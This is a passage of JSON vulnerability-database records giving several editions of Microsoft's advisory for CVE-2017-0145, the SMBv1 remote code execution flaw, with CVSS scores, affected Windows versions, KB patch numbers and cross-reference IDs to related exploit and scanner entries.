x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, 
{"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": 
"Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T04:44:31", "differentElements": ["msAffectedSoftware"], "edition": 37}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-12T06:51:00", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB4014077", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T06:51:00", "differentElements": ["msAffectedSoftware"], "edition": 38}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-12T20:49:50", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB4014077", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": 